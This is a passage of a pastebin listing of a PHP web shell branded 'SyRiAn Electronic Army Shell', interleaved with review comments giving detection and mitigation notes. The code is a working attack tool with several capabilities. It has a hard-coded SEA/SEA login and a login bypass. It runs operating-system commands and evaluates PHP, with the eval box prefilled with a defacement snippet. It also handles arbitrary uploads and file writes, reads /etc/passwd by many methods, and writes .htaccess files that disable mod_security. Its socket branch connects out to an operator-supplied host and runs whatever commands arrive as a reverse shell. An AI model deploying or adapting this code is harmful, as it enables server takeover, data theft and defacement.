Dr_FarFar

[+] SyRiAn Electronic Army Shell :: SEA Shell

Jul 6th, 2014
  1. /***
  2.      ▄▄▄▄▄▄▄▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄     ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄
  3.     ▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌   ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌
  4.     ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌   ▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌
  5.     ▐░▌       ▐░▌▐░▌       ▐░▌   ▐░▌          ▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌       ▐░▌▐░▌       ▐░▌
  6.     ▐░▌       ▐░▌▐░█▄▄▄▄▄▄▄█░▌   ▐░█▄▄▄▄▄▄▄▄▄ ▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌
  7.     ▐░▌       ▐░▌▐░░░░░░░░░░░▌   ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌
  8.     ▐░▌       ▐░▌▐░█▀▀▀▀█░█▀▀    ▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀█░█▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀█░█▀▀
  9.     ▐░▌       ▐░▌▐░▌     ▐░▌     ▐░▌          ▐░▌       ▐░▌▐░▌     ▐░▌  ▐░▌          ▐░▌       ▐░▌▐░▌     ▐░▌  
  10.     ▐░█▄▄▄▄▄▄▄█░▌▐░▌      ▐░▌  ▄ ▐░▌          ▐░▌       ▐░▌▐░▌      ▐░▌ ▐░▌          ▐░▌       ▐░▌▐░▌      ▐░▌
  11.     ▐░░░░░░░░░░▌ ▐░▌       ▐░▌▐░▌▐░▌          ▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌       ▐░▌▐░▌       ▐░▌
  12.      ▀▀▀▀▀▀▀▀▀▀   ▀         ▀  ▀  ▀            ▀         ▀  ▀         ▀  ▀            ▀         ▀  ▀         ▀
  13.  
  14.                          
  15.                                              
  16. ~~~ :xD: Have Fun. Don't Forget To Bookmark This Website :xD:
  17. ~~~ https://www.FaceBook.com/Dr.FarFar
  18. ~~~ http://Dr-FarFar.BlogSpot.com/
  19.  
  20. */
  21.  
  22. UserName = SEA
  23. PassWord = SEA
  24. ###################################################################################################
  25.  
  26. <?php
  // Review annotations (lines starting with "//" that carry no listing number)
  // describe what this web shell does so it can be detected and scoped during
  // incident response. The original code is unchanged.
  27. # Bypass SuHosin
  28. # Virtual
  29. # users 6 ID /etc/passwd
  30.  
  // Hard-coded panel credentials. The same values are printed in the header
  // of this paste, so they are public, not secret.
  31. $user = 'SEA';
  32. $pass = 'SEA';
  33. $uselogin = 1;
  34. $sh3llColor = "green";
  35.  
  // Default MySQL credentials; MySQLReader() and MySQLIReader() further down
  // pull these in with `global`.
  36. # MySQL Info ---------
  37. $DBhost = "localhost";
  38. $DBuser = "root";
  39. $DBpass = "root";
  40. #---------------------
  41. session_start();
  // Runtime set-up: silences PHP errors, removes the execution time limit and
  // keeps the script running after the client disconnects, then tries to reset
  // or switch off safe_mode and open_basedir. safe_mode was removed in PHP 5.4
  // and set_magic_quotes_runtime() in PHP 7.0, so the file targets legacy PHP.
  // Detection: a script under the web root that combines error_reporting(0)
  // with ini_restore()/ini_set() on safe_mode or open_basedir is a strong
  // web-shell indicator.
  42. error_reporting(0);
  43. set_magic_quotes_runtime(0);
  44. set_time_limit(0);
  45. ignore_user_abort(TRUE);
  46. ini_restore("safe_mode");
  47. ini_restore("open_basedir");
  48. ini_set('max_execution_time',0);
  49. ini_set('output_buffering',0);
  50. ini_set('safe_mode','Off');
  51.  
  // The working directory comes from POST 'curDir' (passed through filter(),
  // which is defined outside this excerpt) and is remembered in the session.
  52. // Set Current Directory
  53. if(!$_POST && !$_SESSION['curDir']) {
  54.     $dir = getcwd();
  55.     $_SESSION['curDir'] = $dir;
  56. } else if(empty($_POST['curDir'])) {
  57.     $dir = $_SESSION['curDir'];
  58. } else {
  59.     $dir = filter($_POST['curDir']);
  60.     $_SESSION['curDir'] = $dir;
  61. }
  62. // Set Dir Mode
  63. if($_GET['dir_mode']) {
  64.     $dir_mode = $_GET['dir_mode'];
  65.     $_SESSION['dir_mode'] = $dir_mode;
  66. } else {
  67.     $dir_mode = $_SESSION['dir_mode'];
  68. }
  69.  
  // The execution primitive is chosen by the client through POST 'exe_method'
  // and defaults to "exec".
  // NOTE(review): presumably consumed by Exe(), which is not in this excerpt - confirm.
  70. // Set Usable Command
  71. if($_POST['exe_method']) {
  72.     $exec_method = $_POST['exe_method'];
  73. } else {
  74.     $exec_method = "exec";
  75. }
  // Logout only blanks the two cookies from client-side script and reloads
  // the page; PHP_SELF is written into the script unescaped.
  76. # Logout
  77. if($_POST['logout']) {
  78.     print '<script>document.cookie="user=;";document.cookie="pass=;";</script>';
  79.     print '<script>document.location = "'.$_SERVER['PHP_SELF'].'";</script>';
  80. }
  // OS guess: a ':' as the second character of the path (a drive letter) means Windows.
  81. if(strlen($dir)>1 && $dir[1]==":"){$os = "Windows";}else {$os = "Linux";}
  // Dumps the complete phpinfo() page when the 'info' query parameter is set.
  // This statement sits above the authentication block later in the file, so
  // treat the server configuration as disclosed when scoping an incident.
  82. if($_GET['info']){phpinfo();}
  83. $safeMode = SafeMode();
  // NOTE(review): $SERVER_SOFTWARE is not assigned anywhere in this excerpt;
  // presumably it relies on register_globals - confirm.
  84. $server = substr($SERVER_SOFTWARE,0,120);
  85. $daemon = "";
  86. ?>
  87. <html>
  88. <head>
  89. <title>SyRiAn Electronic Army Shell :: SEA Shell</title>
  90. <link rel="shortcut icon" href='http://i40.tinypic.com/2rpuped.png' />
  91. <meta http-equiv=Content-Type content=text/html; charset=UTF-8>
  92. <?php echo CSS($sh3llColor); ?>
  93.  
  94. </head>
  95. <body dir='ltr'>
  96. <?php
  97. # ---------------------------------------#
  98. #             Authentication             #
  99. #----------------------------------------#
  // Login gate, active only when $uselogin == 1. A visitor counts as logged in
  // when cookie 'user' equals $user and cookie 'pass' equals the unsalted MD5
  // of $pass; both comparisons are loose (!=).
  100. if ($uselogin ==1) {
  101.     if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass)) {
  // Incident-response note: when any query-string parameter is present, the
  // reference values are replaced from $_GET before the POST check below.
  // Together with the published default credentials, this means the login
  // form does not limit use of the shell to whoever planted it.
  102.         if($_GET) {$user = $_GET['user'];$pass = $_GET['pass'];}
  103.         if($_POST['usrname']==$user && $_POST['passwrd']==$pass){
  // On success the cookies are set from JavaScript. POST 'usrname' is written
  // into the script unescaped. Execution then continues into the panel below.
  104.             print'<script>document.cookie="user='.$_POST['usrname'].';";document.cookie="pass='.md5($_POST['passwrd']).';";</script>';
  105.         } else {
  106.             if($_POST['usrname']){
  // The fixed alert text and the image URL in the form below are static
  // strings that can be used in content signatures for this shell family.
  107.                 print'<script>alert("Go and play in the street man !!");</script>';
  108.             }
  109. ?>
  110. <br><br>
  111.             <center><img src="http://i40.tinypic.com/2rpuped.png"><br />
  112.             <sy>SyRiAn Electronic Army</sy>
  113.             </center><br />
  114.             <div align="center">
  115.                 <form method="POST" name="login_form" onSubmit="if(this.usrname.value==''){return false;}">
  116.                 <input dir="ltr" name="usrname" id="username" value="" type="text"  size="30" onBlur="Blur('username','userName');" onClick="Clear('username','userName');"/><br>
  117.                 <input dir="ltr" name="passwrd" id="password" value="" type="password" size="30" onFocus="Focus(2);" /><br>
  118.                 <input type="submit" value=" Login  " name="login" />
  119.                 </form>
  120.             </div>
  121.             <?php
  // A failed or missing login renders footer() (defined outside this excerpt)
  // and stops here.
  122.             footer();
  123.             exit;
  124.         }
  125.     }
  126. }
  127. ?>
  128. <table cellpadding='0' cellspacing='0' width='100%'>
  129.     <tr>
  130.         <td width='160'>
  131.         <center><form method="post"><input type="submit" value="Logout" name="logout" id="logout" /></form></center>
  132.             <a href="<?php echo $_SERVER['PHP_SELF']; ?>"><img border='0' src='http://i40.tinypic.com/2rpuped.png' width='100%' height='100%'></a><br>
  133.             <center>SyRiAn Electronic Army
  134.             <p></p>
  135.                 <select name="dir_mode" id="dir_mode" onchange="change_dir_mode();">
  136.                     <option value="cmd" <?php if($dir_mode == "cmd") {echo "selected";} ?> >CMD</option>
  137.                     <option value="php" <?php if($dir_mode == "php") {echo "selected";} ?>>PHP</option>
  138.                 </select>
  139.             </center>
  140.       </td>
  141.       <td>
  142.       <form method="post">
  143. <table width='100%' style="border:none; padding:2px;" >
  144.     <tr>
  145.         <td width='103'>System</td>
  146.         <td width="323"><?php echo $os; ?></td>
  147.         <td width="90">Apache Modules</td>
  148.         <td width="278"><select ><?php
  149.         if(function_exists("apache_get_modules")) {
  150.             foreach (apache_get_modules() as $module) {
  151.                 echo "<option>".$module."</option>";
  152.             }
  153.         }else {
  154.             echo "<option>NONE</option>";
  155.         }
  156.         ?></select></td>
  157.     </tr>
  158.     <tr>
  159.       <td>uname </td>
  160.       <td><a href='http://www.google.com/search?q=<?php echo php_uname(); ?>' target='_blank'><u><?php echo php_uname(); ?></u></a></td>
  161.       <td>Curl</td>
  162.       <td><?php echo Curl(); ?></td>
  163.     </tr>
  164.     <tr>
  165.         <td>pwd</td>
  166.         <td><?php echo getcwd(); ?></td>
  167.         <td>Open Basedir</td>
  168.         <td><?php echo openBaseDir(); ?></td>
  169.     </tr>
  170.     <tr>
  171.         <td>whoami</td>
  172.         <td><?php echo get_current_user(); ?></td>
  173.         <td>Magic_Quotes</td>
  174.         <td><?php echo magicQouts(); ?></td>
  175.     </tr>
  176.         <tr>
  177.           <td>Server</td>
  178.           <td><?php echo $server; ?></td>
  179.           <td>Register Globals</td>
  180.           <td><?php echo RegisterGlobals(); ?></td>
  181.         </tr>
  182.         <tr>
  183.           <td>Server Name</td>
  184.           <td><?php echo $_SERVER['HTTP_HOST']; ?></td>
  185.           <td>Gzip</td>
  186.           <td><?php echo Gzip(); ?></td>
  187.         </tr>
  188.         <tr>
  189.           <td>Your IP</td>
  190.           <td><?php echo GetRealIP(); ?></td>
  191.           <td>Oracle</td>
  192.           <td><?php echo Oracle(); ?></td>
  193.         </tr>
  194.         <tr>
  195.           <td>Server IP</td>
  196.           <td><a href='http://bing.com/search?q=ip:<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>&go=&form=QBLH&filt=all' target='_blank'><u><?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?></u></a> [<a href="http://whois.webhosting.info/<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>" target='_blank' />Reverse IP]</td>
  197.           <td>MSQL</td>
  198.           <td><?php echo MSQL(); ?></td>
  199.         </tr>
  200.         <tr>
  201.           <td>PHP Version</td>
  202.           <td><a href='javascript:openPHPInfo();'><u><?php echo phpversion(); ?></u></a></td>
  203.           <td>MySQL</td>
  204.           <td><?php echo MySQL2()." ".mysql_get_server_info(); ?></td>
  205.         </tr>
  206.         <tr>
  207.           <td>Safe Mode</td>
  208.           <td><?php echo $safeMode; ?></td>
  209.           <td>MySQLi</td>
  210.           <td><?php echo MysqlI(); ?></td>
  211.         </tr>
  212.         <tr>
  213.         <td>disable functions</td>
  214.         <td><select name="disableFunctions"><?php
  215.         $funArray = DisableFunctions();
  216.         $funArray = explode(",",$funArray);
  217.         sort($funArray);
  218.         foreach($funArray as $fun){echo "<option value='".$fun."'>".$fun."</option>";}
  219.         ?></select>
  220.           <input name="STOP_Execute" type="submit" id="STOP_Execute" value="Turn Off" />
  221.           </td>
  222.         <td>MsSQL</td>
  223.         <td><?php echo MsSQL(); ?></td>
  224.         </tr>
  225. </table>
  226. &nbsp;   [<a href='http://www.md5decrypter.co.uk/' target='_blank'>MD5 Cracker</a>]
  227. [<a href='http://www.md5decrypter.co.uk/sha1-decrypt.aspx' target='_blank'>SHA1 Cracker</a>]
  228. [<a href='http://www.md5decrypter.co.uk/ntlm-decrypt.aspx' target='_blank'>NTLM Cracker</a>]
  229. <input name="USERS_1" type="submit" id="USERS_1" value="Users [1]" />
  230. <input name="USERS_2" type="submit" id="USERS_2" value="Users [2]" />
  231. <input name="USERS_3" type="submit" id="USERS_3" value="Users [3]" />
  232. <input name="USERS_4" type="submit" id="USERS_4" value="Users [4]" />
  233. <input name="USERS_5" type="submit" id="USERS_5" value="Users [5]" />
  234. <input type="submit" name="forbidden_bypass" id="forbidden_bypass" value="Forbidden" />
  235. <input type="submit" name="find_755" id="find_755" value="Find 755" />
  236. <br>
  237. </form>
  238. </table>
  239.  
  240. <form method="post">
  241. <center>
  242. <textarea cols="150" rows="20" name="result" >
  243. <?php
  // Request dispatcher. One branch of the if / else-if chain runs per request,
  // selected by the submit button or field present in $_POST. Whatever a
  // branch prints lands inside the surrounding <textarea>.
  244. chdir($dir);
  // Default view: directory listing from ScanDirs() (defined outside this excerpt).
  245. if($_POST['login'] || !$_POST){echo ScanDirs();}
  // CMD: the POSTed command line goes to Exe() (outside this excerpt), i.e. OS
  // command execution as the web-server user. Detection: the web server or PHP
  // process spawning shells or system utilities.
  246. else if($_POST['CMD_Execute']){if(empty($_POST['CMD_Line'])){echo scanDirs();}else {Exe(urldecode(filter($_POST['CMD_Line']))); }}
  // PHP: POSTed source goes to Evaluation() (outside this excerpt).
  // NOTE(review): presumably eval()-based - confirm.
  247. else if($_POST['PHP_Execute']){$eval = Evaluation(urldecode(filter($_POST['PHP_Line'])));}
  // Upload: each file is written under its client-supplied name relative to
  // the current directory; no type, extension or path checks are visible.
  // Mitigation: the web-server user should not be able to write into
  // directories from which scripts are executed.
  248. else if($_POST['UPLOAD_Execute']) {
  249.     for ($i = 0; $i < count($_FILES['uploadfile']['name']); $i++) {
  250.         if($_FILES['uploadfile']['name'][$i] != '') {
  251.             if(function_exists('copy')){$upload = copy($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
  252.             else{$upload = move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
  253.             if($upload) {echo "The File  ".$_FILES['uploadfile']['name'][$i]." Uploaded Successfully !
  254. ";  }
  255.             else { echo "The File  ".$_FILES['uploadfile']['name'][$i]."  Can't Be Upload :( !
  256. ";}
  257.         }
  258.     }      
  259. }
  // Edit: prints the HTML-escaped contents of a client-named file.
  260. else if($_POST['EDIT_Execute']){$content = htmlspecialchars(file_get_contents(filter($_POST['Edit_Line'])));echo $content;}
  // Save: writes the POSTed textarea to FILE_NAME through GenerateFile()
  // (outside this excerpt), i.e. arbitrary file write.
  261. else if($_POST['SAVE_Execute']) {
  262.     $content = filter($_POST['result']);
  263.     if(empty($content)){$content = " ";}
  264.     if(GenerateFile($_POST['FILE_NAME'],$content)){echo "[+]Saved Success !! ";}else{echo "[-]Save Failed !";}
  265. }
  // Read: one client-named path, many interchangeable read primitives. The
  // breadth suggests the aim is to find a primitive that disable_functions
  // does not cover, so blocking individual functions is not a sufficient
  // control; rely on file permissions, per-site users and open_basedir.
  // fopen() in mode 'r+' runs for every READ_Type, including those that never
  // use $file, and the handle is not closed in this branch.
  266. else if($_POST['READ_Execute']) {
  267.     $path = urldecode(filter($_POST['READ_Line']));
  268.     $file = fopen($path,'r+');
  269.     if($_POST['READ_Type'] == "file"){echo htmlspecialchars(filter(FileF($path)));  }
  270.     else if($_POST['READ_Type'] == "fgets"){while(($line = htmlspecialchars(filter(fgets($file)))) != false){echo $line;}}
  271.     else if($_POST['READ_Type'] == "fgetss"){while(($line = htmlspecialchars(filter(fgetss($file)))) != false){echo $line;}}
  272.     else if($_POST['READ_Type'] == "readfile"){echo htmlspecialchars(filter(readfile($path)));}
  273.     else if($_POST['READ_Type'] == "fread"){echo htmlspecialchars(filter(fread($file,filesize($path))));}
  274.     else if($_POST['READ_Type'] == "file_get_contents"){echo htmlspecialchars(filter(file_get_contents($path)));}
  275.     else if($_POST['READ_Type'] == "tempnam"){echo htmlspecialchars(filter(TempnameF($path)));}
  276.     else if($_POST['READ_Type'] == "copy"){echo htmlspecialchars(filter(CopyF($path)));}
  277.     else if($_POST['READ_Type'] == "mb_send_mail"){echo htmlspecialchars(filter(mbSendEmail($path)));}
  278.     else if($_POST['READ_Type'] == "highlight_file"){echo htmlspecialchars(filter(highlightFile($path)));}
  279.     else if($_POST['READ_Type'] == "curl"){echo htmlspecialchars(filter(CurlFileRead($path)));}
  280.     else if($_POST['READ_Type'] == "imap"){echo htmlspecialchars(filter(ImapF($path)));}
  281.     else if($_POST['READ_Type'] == "id"){echo htmlspecialchars(filter(ReadId($path)));}
  282.     else if($_POST['READ_Type'] == "show_source"){echo htmlspecialchars(filter(show_source($path)));}
  283.     else if($_POST['READ_Type'] == "mysql"){echo htmlspecialchars(filter(MySQLReader($path)));}
  284.     else if($_POST['READ_Type'] == "mysqli"){echo htmlspecialchars(filter(MySQLIReader($path)));}
  285.     else if($_POST['READ_Type'] == "symlink"){echo htmlspecialchars(filter(SymlinkF($path)));}
  286.     else if($_POST['READ_Type'] == "ioncube"){echo htmlspecialchars(filter(ioncube_read_file($path)));}
  287.     else if($_POST['READ_Type'] == "error_log"){echo htmlspecialchars(filter(ErrorLog($path)));}
  288.     else if($_POST['READ_Type'] == "include"){echo htmlspecialchars(filter(IncludeReader($path)));}
  289. }
  // "Turn Off": drops a php.ini and an .htaccess into the current directory in
  // an attempt to disable safe_mode, disable_functions, open_basedir and
  // mod_security filtering for that directory (the SecFilter* directives are
  // ModSecurity 1.x syntax). Detection: an unexpected php.ini, or an .htaccess
  // containing "SecFilterEngine Off" or "SetEnv PHPRC", inside a web root.
  // Mitigation: restrict per-directory overrides (AllowOverride None) and do
  // not let the web-server user write into served directories.
  290. else if($_POST['STOP_Execute']) {
  291. $genTry = GenerateFile("php.ini","
  292. safe_mode = Off
  293. disable_functions = NONE
  294. safe_mode_gid = OFF
  295. open_basedir = OFF");
  296.     if($genTry){echo "[+] php.ini Has Been Generated Successfully
  297. ";}
  298.     else {echo "[-] Failed to generate php.ini file !!
  299. ";}
  300.    
  301.     $genTry = GenerateFile(".htaccess","
  302. <IfModule mod_security.c>
  303. SecFilterEngine Off
  304. SecFilterScanPOST Off
  305. SecFilterCheckURLEncoding Off
  306. SecFilterCheckCookieFormat Off
  307. SecFilterCheckUnicodeEncoding Off
  308. SecFilterNormalizeCookies Off
  309. </IfModule>
  310. <Limit GET POST>
  311. order deny,allow
  312. deny from all
  313. allow from all
  314. </Limit>
  315. <Limit PUT DELETE>
  316. order deny,allow
  317. deny from all
  318. </Limit>
  319. SetEnv PHPRC ".getcwd()."/php.ini
  320.     ");
  321.     if($genTry){echo "[+] .htaccess Has Been Generated Successfully
  322. ";}
  323.     else {echo "[-] Failed to generate .htaccess file !!
  324. ";}
  325. }
  // "Back Connection" (socks): opens an outbound TCP connection to the
  // client-supplied ip/port and passes everything read from the socket to
  // shell_exec(). Detection and mitigation: egress filtering on web servers,
  // alerting on outbound connections made by the web-server process, and the
  // fixed banner string below as a network signature.
  326. else if($_POST['CON_Type'] == "socks") {
  327.     $sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  328.     if($sock < 0){echo "[-] failed to create socket.";}
  329.     else {
  330.         $result = socket_connect($sock, filter(trim($_POST['ip'])), filter(trim($_POST['port'])));
  331.         if($result < 0){echo "[-] failed to connect back to host:".$_GET['host'];}
  332.         else {
  333.             $send_var = "\n\n -== SyRiAn Electronic Army , Back Connection ==-\n$";
  334.             socket_write($sock, $send_var, strlen($send_var));
  335.             while($input = socket_read($sock, 10000)) {
  336.                 socket_write($sock, shell_exec($input), 12000);
  337.             }
  338.         }
  339.     }
  // "Back Connection" (fsockopen): same outbound connection and banner. As
  // written, this branch runs only the fixed commands uname -a, pwd, id and
  // whoami; each line received from the peer is echoed back, not executed.
  340. } else if($_POST['CON_Type'] == "fsockopen") {
  341.     $ip = filter(trim($_POST['ip']));
  342.     $port = filter(trim($_POST['port']));
  343.     if (!empty($ip)) {
  344.         $con_fsockopen = fsockopen($ip , $port , $errno, $errstr );
  345.         if (!$con_fsockopen){
  346.             $result = "Error: didnt connect !!!";
  347.         } else {
  348.             $newLine="\n";          
  349.             fputs ($con_fsockopen ,"\n\n -== SyRiAn Electronic Army , Back Connection ==-\n$");
  350.             fputs($con_fsockopen , system("uname -a") .$newLine );
  351.             fputs($con_fsockopen , system("pwd") .$newLine );
  352.             fputs($con_fsockopen , system("id") .$newLine.$newLine );
  353.             while(!feof($con_fsockopen)){  
  354.                 fputs ($con_fsockopen);
  355.                 $one="[$";
  356.                 $two="]";
  357.                 $result= fgets ($con_fsockopen, 8192);
  358.                 $message = $result;
  359.                 fputs ($con_fsockopen, $one. system("whoami") .$two. " " .$message."\n");
  360.             }
  361.             fclose ($con_fsockopen);
  362.         }
  363.     }
  364. }
  // "Users [1]".."Users [5]": local account enumeration through the
  // GetUsers1()..GetUsers5() helpers defined further down the file.
  365. else if($_POST['USERS_1']){echo GetUsers1();}
  366. else if($_POST['USERS_2']) {
  367.      $array = GetUsers2();
  368.      foreach($array as $line)
  369.      {echo $line."
  370. ";}
  371. }
  372. else if($_POST['USERS_3']) {
  373.      $array = GetUsers3();
  374.      foreach($array as $line)
  375.      {echo $line."
  376. ";}
  377. }
  378. else if($_POST['USERS_4']) {
  379.      $array = GetUsers4();
  380.      foreach($array as $line)
  381.      {echo $line."
  382. ";}
  383. } else if($_POST['USERS_5']){echo GetUsers5();}
  // "Forbidden": creates ./forbidden with an .htaccess that serves .php and
  // .html as text/plain and uses sea.txt as index/header/readme; the printed
  // hint refers to a symlink named sea.txt placed there by the operator.
  // Detection: a directory named "forbidden" holding such an .htaccess, or
  // symlinks under a docroot that point outside it. Mitigation: disable
  // FollowSymLinks (or use SymLinksIfOwnerMatch) and restrict AllowOverride.
  384. else if($_POST['forbidden_bypass']) {
  385.     mkdir("forbidden");
  386.     chdir("forbidden");
  387.     $forbidden_htaccess = GenerateFile(".htaccess", "
  388. DirectoryIndex sea.txt
  389. HeaderName sea.txt
  390. ReadmeName sea.txt
  391. footerName sea.txt
  392. ErrorDocument 404 /404.html
  393. 404.html = Symlinked sea.txt
  394. Options all
  395. ForceType text/plain
  396. AddType text/plain .php
  397. AddType text/plain .html
  398. AddHandler server-parsed .php
  399. AddHandler txt .php
  400.     ");
  401.     if($forbidden_htaccess) {
  402.         echo "[+] make your symlink as sea.txt in /forbidden/ folder and find the url /forbidden/sea.txt or /forbidden/";
  403.     } else {
  404.         echo "[-] error with generating .htaccess file.";
  405.     }
  // "Find 755": lists /home/*/public_html directories whose mode is
  // drwxr-xr-x, i.e. other accounts' web roots readable by any local user.
  // Mitigation on shared hosts: do not leave home and docroot directories
  // world-readable; isolate sites with per-account PHP users.
  406. } else if($_POST['find_755']) {
  407.     Exe("ls -dl /home/*/public_html/ | grep drwxr-xr-x");
  408. }
  409. ?></textarea>
  410. <?php
  411. if($_POST['EDIT_Execute']){echo "<input type='submit' value='Save' name='SAVE_Execute' class='Save' />
  412. <input type='hidden' name='FILE_NAME' value='".$_POST['Edit_Line']."' />
  413. ";}
  414. ?>
  415. </center></form>
  416. <table width='100%'>
  417.     <tr valign="top">
  418.         <td width='30%'>
  419.        <!-- Command Line -->
  420.        <form method='POST' enctype="multipart/form-data">
  421.             <table height='72' border='0' id='Box' width="100%">
  422.               <tr>
  423.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  424.                     <td style="background-color:#666;padding-left:10px;">Edit File
  425.                     <input name="EDIT_Execute" type="submit" id="EDIT_Execute" value="Edit" /></td>
  426.               </tr>
  427.                 <tr>
  428.                   <td height="45" colspan="2"><input type='text' name='Edit_Line' id='Edit_Line' value='<?php if($_POST['EDIT_Execute']){echo filter($_POST['Edit_Line']);}else {echo $dir;} ?>' size="70"></td>
  429.                 </tr>
  430.             </table>
  431.         </form>
  432.         <!-- End Of Command Line-->
  433.        
  434.         </td>
  435.         <td width='30%' height='30'>
  436.          <!-- Command Line -->
  437.          <form method='POST' enctype="multipart/form-data">
  438.               <table height='72' border='0' id='Box'>
  439.               <tr>
  440.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  441.                 <td style="background-color:#666;padding-left:10px;">Command Line
  442.                 <?php echo print_exe_method(); ?>
  443.                 <input name="CMD_Execute" type="submit" id="CMD_Execute" value="Execute" onClick="document.getElementById('CMD_Line').value = encodeURIComponent(document.getElementById('CMD_Line').value);">
  444.                 </td>
  445.             </tr>
  446.                 <tr>
  447.                   <td height="45" colspan="2">
  448.                     <?php echo SelectCommand($os); ?>
  449.                     <input type='text' name='CMD_Line' id='CMD_Line' value='' size="70">
  450.                   <input name="curDir" type="text" id="curDir" value="<?php if($_POST['Execute']){echo $_POST['curDir'];} else {echo getcwd();} ?>" size="70"></td>
  451.                 </tr>
  452.             </table>
  453.         </form>
  454.         <!-- End Of Command Line-->
  455.       </td>
  456.         <td width='30%' height='30' valign="top">
  457.         <!-- Commands Alias-->
  458.         <form method='POST' enctype="multipart/form-data">
  459.             <table width='100%' height='72' border='0' id='Box'>
  460.               <tr>
  461.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  462.                     <td style="background-color:#666;padding-left:10px;">Upload Files             <span style="padding-left:10px;">
  463.                       <input type='button' value='+' id='addUpload' size='5' onclick='addUploadInput();'>
  464.                     <input name='UPLOAD_Execute' type='submit' id="UPLOAD_Execute" value='Upload Files'>
  465.                     </span></td>
  466.               </tr>
  467.                 <tr>
  468.                   <td height="45" colspan="2">
  469.                   <input type='file' name='uploadfile[]'>
  470.                   <input type='file' name='uploadfile[]'><div id='uploadInput'></div></td>
  471.                 </tr>
  472.             </table>
  473.         </form>
  474.         <!-- End Of Commands Alias-->
  475.         </td>
  476.     </tr>
  477. <tr valign="top">
  478.         <td width='30%'>
  479.        <!-- Commands Alias-->
  480.        <form method='POST' enctype="multipart/form-data">
  481.             <table width='100%' height='72' border='0' id='Box'>
  482.               <tr>
  483.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  484.                     <td style="background-color:#666;padding-left:10px;">PHP Eval                
  485.                     <input name="PHP_Execute" type="submit" id="PHP_Execute" onClick="document.getElementById('PHP_Line').value = encodeURIComponent(document.getElementById('PHP_Line').value);" value="Evaluate"></td>
  486.               </tr>
  487.                 <tr>
  488.                   <td height="45" colspan="2"><label for="PHP_Line"></label>
  489.                   <textarea name="PHP_Line" id="PHP_Line" cols="50" rows="2"><?php if($_POST['PHP_Execute']){echo urldecode(filter($_POST['PHP_Line']));}else {echo '$file = fopen("index.php","w+");
  490.     fwrite($file,"Hacked");
  491.     fclose($file);';}
  492.                 ?>
  493.                   </textarea>
  494.                   <br></td>
  495.               </tr>
  496.             </table>
  497.         </form>
  498.         <!-- End Of Commands Alias-->
  499.         </td>
  500.         <td width='30%' height='30'>
  501.         <!-- Commands Alias-->
  502.         <form method='POST' enctype="multipart/form-data">
  503.         <table width='100%' height='72' border='0' id='Box'>
  504.           <tr>
  505.           <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  506.                 <td style="background-color:#666;padding-left:10px;">Read Files
  507.                  
  508.                   <select name="READ_Type" >
  509.                     <option value="file" >file</option>
  510.                     <option value="fgets" >fgets</option>
  511.                     <option value="fgetss" >fgetss</option>
  512.                     <option value="readfile" >readfile</option>
  513.                     <option value="fread" >fread</option>
  514.                     <option value="show_source" >show_source</option>
  515.                     <option value="file_get_contents" >file_get_contents</option>
  516.                     <option value="tempnam" >tempnam</option>
  517.                     <option value="copy" >copy</option>
  518.                     <option value="symlink" >Symlink</option>
  519.                     <option value="mb_send_mail" >mb_send_mail</option>
  520.                     <option value="highlight_file" >highlight_file</option>
  521.                     <option value="curl" >Curl</option>
  522.                     <option value="imap" >Imap</option>
  523.                     <option value="mysql" >MySQL</option>
  524.                     <option value="mysqli" >MySQLI</option>
  525.                     <option value="ioncube">Ion Cube</option>
  526.                     <option value="error_log">Error_Log</option>
  527.                     <option value="include">Include</option>
  528.                     <option value="id" >ID /etc/passwd</option>
  529.                   </select>
  530.                   <input name="READ_Execute" type="submit" id="READ_Execute" onClick="document.getElementById('READ_Line').value = encodeURIComponent(document.getElementById('READ_Line').value);" value="Read"></td>
  531.           </tr>
  532.             <tr>
  533.               <td height="45" colspan="2"><input type='text' name='READ_Line' id='READ_Line' value='<?php if($_POST['READ_Execute']){echo urldecode(filter($_POST['READ_Line']));}else {echo $dir;} ?>' size="70"></td>
  534.           </tr>
  535.         </table>
  536.         </form>
  537.         <!-- End Of Commands Alias-->
  538.   </td>
  539.         <td width='30%' height='30' valign="top">
  540.         <!-- Commands Alias-->
